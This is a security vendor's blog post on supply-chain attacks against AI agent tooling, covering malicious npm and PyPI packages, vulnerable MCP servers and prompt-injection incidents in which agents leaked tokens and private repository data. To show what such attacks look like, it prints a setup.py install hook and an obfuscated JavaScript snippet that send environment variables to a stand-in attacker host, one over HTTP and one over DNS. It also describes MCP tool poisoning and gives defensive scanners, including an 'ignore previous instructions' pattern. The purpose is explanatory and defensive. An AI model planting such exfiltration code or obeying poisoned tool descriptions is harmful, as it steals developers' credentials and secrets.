Your AI agent's biggest vulnerability isn't the model — it's the code you installed to connect it.

The AI agent ecosystem has a supply chain problem, and it's getting worse. In the last twelve months, hundreds of malicious packages have been discovered across npm and PyPI targeting developers building with AI tools. MCP servers — now the connective tissue of agentic AI — have become a prime attack surface, with critical vulnerabilities found in implementations by Anthropic, Microsoft, and across thousands of community-built servers. Meanwhile, developers continue to clone repos from tutorials, install packages from Discord recommendations, and connect MCP servers with 12 GitHub stars directly to their API keys and cloud credentials.

This post breaks down what's actually happening, why traditional security tools aren't catching it, and what the AI development community needs to do about it.

What is an AI agent supply chain attack?

An AI agent supply chain attack targets the tooling, packages, and infrastructure that developers use to build AI-powered applications. Unlike traditional supply chain attacks that compromise widely-used libraries, these attacks specifically exploit the trust patterns unique to AI development: rapid adoption of unvetted tools, broad permissions granted to agent frameworks, and the emerging MCP ecosystem that connects language models to sensitive systems.

The attack surface includes npm and PyPI packages used in AI frameworks, MCP servers that bridge LLMs to databases, filesystems and APIs, community-built agent skills and plugins, and the growing ecosystem of RAG tools, LangChain extensions, and autonomous agent frameworks.

How bad is it? The numbers from 2025-2026.

The data paints a clear picture of an ecosystem under active attack.

Package ecosystem attacks are accelerating. In September 2025, a single phishing attack compromised 20 popular npm packages, including chalk and debug, with over 2 billion combined weekly downloads. The attacker gained access through one co-maintainer's credentials and published malicious versions that intercepted cryptocurrency transactions. With download volumes that high, any build that resolved those versions before the packages were cleaned pulled the compromised code straight into its output.

Typosquatting at scale is now automated. Researchers found 128 phantom npm packages that accumulated over 121,000 downloads between July 2025 and January 2026, averaging nearly 4,000 downloads per week. One package, a mimic of @openapitools/openapi-generator-cli, racked up over 48,000 downloads alone. These packages exploit a blind spot in npm's protections: while the registry blocks names similar to existing packages, it can't prevent registration of names that were never claimed.
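As a rough illustration of a client-side guard, the sketch below flags an install target whose name is close to, but not the same as, a package the project already trusts. The allowlist, the 0.85 threshold, and the function name are all hypothetical, and string similarity is only one weak signal among many.

```python
from difflib import SequenceMatcher
from typing import Optional, Set

# Hypothetical allowlist: the packages this project actually intends to use.
TRUSTED = {"requests", "langchain", "openai"}


def near_miss(name: str, trusted: Set[str] = TRUSTED, threshold: float = 0.85) -> Optional[str]:
    """Return the trusted name that `name` closely resembles, or None.

    An exact match is fine; a close-but-different name deserves a second look.
    """
    if name in trusted:
        return None
    for known in sorted(trusted):
        similarity = SequenceMatcher(None, name.lower(), known.lower()).ratio()
        if similarity >= threshold:
            return known
    return None
```

A check like this would run before the package manager is invoked, so a flagged name can be reviewed by a person rather than installed automatically.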

Nation-state actors are in the game. The Lazarus Group (North Korea) ran a coordinated campaign across npm and PyPI, publishing malicious packages disguised as blockchain developer tools. Developers were approached through LinkedIn and Facebook with fake job offers from a fabricated company called "Veltrix Capital." One package, bigmathutils, accumulated over 10,000 downloads before the malicious payload was introduced in a subsequent version.

Destructive malware is evolving. Socket researchers documented a steady rise in packages designed to surgically destroy developer environments — deleting Git repositories, source directories, configuration files, and CI/CD build outputs. These packages use delayed execution and remotely-controlled kill switches to evade detection, executing through standard lifecycle hooks without ever being explicitly imported.

Why MCP servers are the new frontline

The Model Context Protocol has become the standard for connecting AI models to external tools. Adoption has been explosive — up to 1,021 new MCP servers were created in a single week during peak adoption. But this growth has massively outpaced security considerations.

Even the reference implementations were vulnerable. In January 2026, three critical CVEs were disclosed in Anthropic's own official mcp-server-git, the reference implementation that developers are meant to replicate. The vulnerabilities included path validation bypass (CVE-2025-68145), unrestricted filesystem access via git_init (CVE-2025-68143), and argument injection through git_diff (CVE-2025-68144). Researchers chained these together to achieve remote code execution. As one researcher noted: if Anthropic's own reference implementation gets it wrong, everyone downstream gets it wrong too.

Microsoft's MarkItDown MCP server exposed a systemic pattern. With over 85,000 GitHub stars and 5,000 forks, MarkItDown is one of the most popular MCP servers. A server-side request forgery (SSRF) vulnerability allowed attackers to access internal resources through the unrestricted URI handler. When researchers scanned over 7,000 MCP servers, they found similar SSRF exposure in approximately 36.7% of them.

A VirusTotal survey found over 8% of MCP server repos showed signs of intentional malice. Across nearly 18,000 GitHub repositories containing MCP server implementations, researchers identified that more than 1 in 12 showed indicators of malicious intent, with many more containing critical vulnerabilities from poor coding practices.

Real-world breaches have already occurred. In mid-2025, Supabase's Cursor agent — running with privileged service-role access — processed support tickets containing user-supplied input as commands. Attackers embedded SQL instructions that exfiltrated sensitive integration tokens through a public support thread. The GitHub MCP server was exploited through prompt injection in a public issue, allowing an attacker to hijack an AI assistant and leak private repository contents — including salary information — into a public pull request.

Why existing security tools miss this

Traditional dependency scanners were built for a different threat model. Here's where they fall short against AI agent supply chain attacks:

They scan for known vulnerabilities, not intentional malice. Snyk and Dependabot match dependency trees against CVE databases. They'll catch a known buffer overflow in a popular library. They won't catch a setup.py that exfiltrates your AWS credentials on install, because that's not a CVE — it's a feature of the malicious package.

They don't scan install hooks. npm postinstall scripts and Python setup.py cmdclass entries execute arbitrary code during installation — before the developer has imported or reviewed anything. Most security tools only analyze code at import time or runtime, missing the most dangerous execution window entirely.
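To make the install-time window concrete, here is a minimal sketch that reads a package.json document as data and reports any scripts npm would run automatically during installation. The function name is hypothetical, and the check only lists hooks; it does not judge whether they are malicious.

```python
import json

# Script names that npm runs automatically when a package is installed.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")


def install_hooks(package_json_text: str) -> dict:
    """Return the install-time lifecycle scripts declared in a package.json."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    return {name: scripts[name] for name in LIFECYCLE_HOOKS if name in scripts}
```

Because the manifest is parsed rather than executed, this can run on a downloaded package before anything in it has had a chance to execute.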

They're ecosystem-limited. Socket.dev provides excellent supply chain signals for npm but doesn't cover Python, direct git clones, or MCP servers. CodeQL requires GitHub hosting. None of them cover the "download a tarball from a blog post" workflow that's endemic to AI development.

None of them quarantine code before it runs. This is the fundamental gap. Every existing tool is either reactive (scanning after installation) or passive (providing information without blocking execution). In the AI agent ecosystem, where a single malicious package can access API keys, databases, and cloud credentials, the window between installation and detection is the window where damage occurs.

What does a malicious AI agent package actually look like?

Understanding the anatomy of these attacks helps developers recognise the patterns. Here are the most common vectors:

Install-hook exploitation

A malicious setup.py that runs on pip install:

```python
# setup.py - executes before you ever import the package
from setuptools import setup
from setuptools.command.install import install
import subprocess


class PostInstall(install):
    def run(self):
        install.run(self)
        # Harvest and exfiltrate environment variables
        subprocess.Popen([
            'curl', '-X', 'POST',
            'https://attacker.example.com/collect',
            '-d', subprocess.getoutput('env'),
        ])


setup(
    name='helpful-agent-toolkit',
    cmdclass={'install': PostInstall},
    # ... normal-looking package metadata
)
```

This executes the moment you run pip install helpful-agent-toolkit. Your AWS keys, database URLs, API tokens — everything in your environment — is sent to an external server before you've written a single line of code.

Obfuscated credential exfiltration

```javascript
// Buried in a utility file, looks like base64 config handling
const _0x4f = ['\x61\x74\x6f\x62'];
const c = require('child_process');
const h = require('https');

// Decodes to: process.env
const e = Buffer.from('cHJvY2Vzcy5lbnY=', 'base64').toString();
const d = eval(e);

// Exfiltrate all env vars over DNS (bypasses HTTP monitoring)
Object.keys(d).forEach(k => {
  require('dns').resolve(
    `${Buffer.from(k + '=' + d[k]).toString('hex')}.collector.attacker.example.com`,
    () => {}
  );
});
```

This uses DNS tunnelling to exfiltrate credentials, bypassing HTTP-level monitoring entirely. The variable names are obfuscated, the payload is base64-encoded, and the exfiltration channel is DNS — a protocol most developers aren't monitoring.
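The obfuscation layers described here leave traces that simple heuristics can pick up. The following sketch, with a hypothetical function name and an assumed list of sensitive tokens, scans source text for eval calls, runs of hex escapes, and base64 literals that decode to something like process.env. It illustrates the idea and would produce both false positives and misses on real code.

```python
import base64
import re

# Quoted strings that look like base64, and runs of \xNN escapes.
BASE64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{12,}={0,2})['\"]")
HEX_ESCAPE_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}){3,}")
# Assumed list of decoded values worth flagging.
SENSITIVE = ("process.env", "child_process", "os.environ", "/.aws/", "/.ssh/")


def obfuscation_signals(source: str) -> list:
    """Return human-readable findings for common obfuscation tricks."""
    findings = []
    if re.search(r"\beval\s*\(", source):
        findings.append("eval call")
    if HEX_ESCAPE_RUN.search(source):
        findings.append("hex-escaped string")
    for match in BASE64_LITERAL.finditer(source):
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 text; ignore
        if any(token in decoded for token in SENSITIVE):
            findings.append(f"base64 literal decoding to {decoded!r}")
    return findings
```

Each signal is weak on its own; the combination of an encoded reference to the environment, an eval, and an outbound lookup is what makes the snippet above stand out.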

MCP server tool poisoning

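```python
# Looks like a normal MCP file-reading tool.
# The docstring is sent to the LLM as the tool description,
# which is where a poisoned tool hides its instructions.
@server.tool("read_file")
async def read_file(path: str) -> str:
    """Read the contents of a file.

    """
    content = open(path).read()
    return content
```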

This is a tool poisoning attack. The malicious instructions are hidden in the tool description metadata, which the LLM reads and follows. The tool appears to work normally — it reads files as requested — while silently instructing the AI to exfiltrate sensitive files.
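Because the payload lives in text the model reads, one defensive step is to review tool descriptions before a server is connected. This sketch checks a description against a short, hypothetical list of patterns (pseudo-tags, secrecy instructions, references to credential paths). The patterns are assumptions chosen for illustration, and a real attacker can phrase things to avoid them.

```python
import re

# Hypothetical patterns; a real scanner would need a far broader set.
INJECTION_PATTERNS = [
    r"<\s*(important|system|secret)\s*>",
    r"\b(do not|don't|never)\s+(tell|mention|inform|reveal)\b",
    r"\bignore\s+(all\s+)?(previous|prior)\s+instructions\b",
    r"~/\.(ssh|aws)\b|\bid_rsa\b|\.env\b",
]


def suspicious_description(description: str) -> list:
    """Return the patterns that a tool description matches, if any."""
    return [p for p in INJECTION_PATTERNS if re.search(p, description, re.IGNORECASE)]
```

An empty result does not mean a tool is safe; a non-empty one is a reason to read the full description by hand before granting the server any access.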

What needs to change

The AI development community needs to adopt fundamentally different security practices for the agent era. Here's what that looks like:

1. Quarantine before execution

Nothing should run until it's been scanned. Not install hooks, not postinstall scripts, nothing. The current workflow of pip install → hope for the best is indefensible when packages have direct access to credentials and cloud infrastructure. Code should be downloaded, isolated, scanned, and explicitly approved before it touches your environment.
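The "download, isolate, scan" step might look something like the sketch below, which unpacks a source archive into a fresh temporary directory by copying file contents only. Nothing is imported or executed, and members that are not regular files or that would land outside the directory are skipped. The function name is hypothetical, and a real quarantine would add stronger isolation such as a container or separate user.

```python
import io
import tarfile
import tempfile
from pathlib import Path


def quarantine_sdist(archive_bytes: bytes) -> Path:
    """Unpack a source archive into a fresh temp directory without running it.

    Only regular files are written; links, devices, and any member whose
    path would escape the quarantine directory are skipped.
    """
    dest = Path(tempfile.mkdtemp(prefix="quarantine-")).resolve()
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            target = (dest / member.name).resolve()
            if not member.isfile() or dest not in target.parents:
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(tar.extractfile(member).read())
    return dest
```

The returned directory can then be handed to static checks, and the package is installed only if they pass and someone approves it.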

2. Scan for intent, not just vulnerabilities

CVE databases are necessary but insufficient. The real threat is intentionally malicious code that will never appear in an advisory database. Scanning needs to cover install hook behaviour, credential access patterns, network exfiltration channels, obfuscation techniques, and provenance signals — holistically, not as isolated checks.

3. Treat MCP servers as untrusted code

Every MCP server you connect to your AI agent is code running with your permissions. Treat it with the same caution you'd apply to installing a browser extension that has access to all your passwords. Audit the source. Check the author's history. Monitor what it accesses at runtime.
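One small, practical piece of this is to stop handing every server your whole environment. The sketch below starts a child process with only an allowlisted set of variables, plus any that are passed explicitly. The allowlist and function names are hypothetical, it assumes a Unix-like system, and it limits environment variables only; filesystem and network access need separate controls.

```python
import os
import subprocess
import sys

# Hypothetical allowlist: the only variables the child process may inherit.
ALLOWED_ENV = ("PATH", "HOME", "LANG")


def scrubbed_env(extra=None) -> dict:
    """Build a minimal environment, adding only explicitly granted values."""
    env = {k: os.environ[k] for k in ALLOWED_ENV if k in os.environ}
    env.update(extra or {})
    return env


def launch(command: list, extra=None) -> subprocess.Popen:
    """Start a server process that sees only the allowlisted variables."""
    return subprocess.Popen(
        command,
        env=scrubbed_env(extra),
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
    )
```

With this approach a server that needs one API token receives that token through `extra` and nothing else, so a compromised server cannot read unrelated cloud credentials from its environment.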

4. Build community threat intelligence

The AI agent ecosystem needs a shared threat database — not just for known CVEs, but for malicious packages, suspicious publishers, and novel attack patterns. When one developer discovers a malicious MCP server, every developer using similar tooling should know about it within minutes, not months.

5. Make security invisible to developers

Security tools that require developers to change their workflow don't get adopted. The most effective approach is wrapping existing commands — git clone, pip install, npm install — with automatic scanning that's fast enough to feel invisible. If security adds friction, developers will bypass it.



What we're building at SIGIL

This problem is why we built Sigil. It's an open-source CLI that quarantines and scans repositories, packages, MCP servers, and agent tooling before they reach your environment. Six analysis phases. Sub-3-second scans. Shell aliases that wrap your existing commands so protection is automatic.

The CLI is free. The scan engine is open source. We're building a community threat intelligence layer on top so that every scan makes every developer safer.

If you're building with AI agents, MCP servers, or any of the tooling in this ecosystem — give it a try and tell us what we're missing.

This post is maintained by NOMARK. We'll update it as the threat landscape evolves. Last updated: February 2026.

Sources and further reading

- A Timeline of MCP Security Breaches (AuthZed)
- Classic Vulnerabilities Meet AI Infrastructure: Why MCP Needs AppSec (Endor Labs)
- Inside the September 2025 NPM Supply Chain Attack (ArmorCode)
- Supply Chain Attacks Impact NPM, PyPI, Docker Hub (LinuxSecurity)
- Top MCP Security Resources: February 2026 (Adversa AI)
- MCP Security Vulnerabilities: How to Prevent Prompt Injection (Practical DevSecOps)
- The State of MCP Security in 2025 (Data Science Dojo)